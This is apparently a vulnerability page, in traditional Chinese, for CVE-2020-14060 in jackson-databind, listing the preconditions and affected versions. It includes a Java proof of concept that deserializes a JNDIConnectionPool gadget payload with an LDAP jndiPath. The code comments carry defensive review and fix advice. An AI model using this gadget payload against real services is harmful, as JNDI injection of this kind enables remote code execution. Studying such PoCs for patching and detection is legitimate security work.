CVE-2020-14060 FasterXML jackson-databind 反序列化漏洞
利用條件
應用程式對 ObjectMapper 開啟了 enableDefaultTyping()
classpath 中包含第三方依賴 org.apache.drill.exec:drill-jdbc-all
影響版本
jackson-databind before 2.9.10.4
jackson-databind before 2.8.11.6
jackson-databind before 2.7.9.7
POC
package com.jacksonTest;
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;
/**
 * Minimal reproduction of the unsafe configuration behind CVE-2020-14060.
 *
 * <p>Two conditions listed on this page are both present here: default typing is
 * switched on for the {@link ObjectMapper}, and the JSON input names a class that
 * ships inside the shaded {@code drill-jdbc-all} artifact. With default typing on,
 * the first element of the JSON array is treated as a class name chosen by whoever
 * supplies the input, so the input, not the application, decides what gets
 * instantiated and which properties are set on it.
 *
 * <p>Defensive reading: code that calls {@code enableDefaultTyping()} on a mapper
 * that parses untrusted JSON is the thing to look for in review. On jackson-databind
 * 2.10 and later, {@code activateDefaultTyping(...)} with a restrictive
 * {@code PolymorphicTypeValidator} replaces it; on the affected lines the fix is to
 * upgrade and, where possible, drop default typing altogether.
 */
public class Poc {

    public static void main(String[] args) throws Exception {
        final ObjectMapper objectMapper = new ObjectMapper();
        // The vulnerable switch: polymorphic type information is now read from the input.
        objectMapper.enableDefaultTyping();

        // Array form ["<class name>", {<properties>}]; the address is loopback, as on the page.
        final String json =
                "[\"oadd.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"ldap://127.0.0.1:1099/Exploit\"}]";

        try {
            // Deserialization instantiates the named class and applies the jndiPath property.
            final Object decoded = objectMapper.readValue(json, Object.class);
            // NOTE(review): re-serializing presumably invokes the object's getters, which is
            // where the JNDI path would be used; confirm against the gadget class.
            objectMapper.writeValueAsString(decoded);
        } catch (IOException e) {
            // A patched jackson-databind is expected to land here, since it rejects the type.
            e.printStackTrace();
        }
    }
}